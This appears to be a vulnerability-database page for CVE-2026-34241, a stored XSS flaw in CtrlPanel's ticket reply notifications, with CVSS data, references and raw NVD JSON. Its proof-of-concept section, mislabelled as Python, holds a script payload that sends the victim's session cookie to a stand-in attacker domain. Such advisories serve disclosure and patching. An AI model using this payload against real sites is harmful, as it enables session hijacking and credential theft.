CVE-2026-34241

Description

CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient's browser. The flaw exists in both App\Notifications\Ticket\Admin\AdminReplyNotification (triggered when a user replies, targeting admins) and App\Notifications\Ticket\User\ReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim's session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim's behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

CtrlPanel <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2026-34241: Stored XSS in Ticket Reply -->
<!-- Attacker inputs this payload in the ticket reply message body -->
<script>
  // Example: Steal session cookie and send to attacker server
  var payload = document.cookie;
  fetch('https://attacker-controlled-domain.com/log?key=' + encodeURIComponent(payload), {
    method: 'GET',
    mode: 'no-cors'
  });
  
  // Example: Perform action as admin (CSRF-like behavior within XSS context)
  // alert('XSS Executed in Admin Context');
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34241
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34241
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34241/
[4] VulDB https://vuldb.com/cve/CVE-2026-34241
[5] https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0
[6] https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-cmrr-q3hw-3vqh
[7] https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-cmrr-q3hw-3vqh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34241", "sourceIdentifier": "[email protected]", "published": "2026-05-19T22:16:37.297", "lastModified": "2026-05-20T16:16:25.253", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient's browser. The flaw exists in both App\\Notifications\\Ticket\\Admin\\AdminReplyNotification (triggered when a user replies, targeting admins) and App\\Notifications\\Ticket\\User\\ReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim's session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim's behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0", "source": "[email protected]"}, {"url": "https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-cmrr-q3hw-3vqh", "source": "[email protected]"}, {"url": "https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-cmrr-q3hw-3vqh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}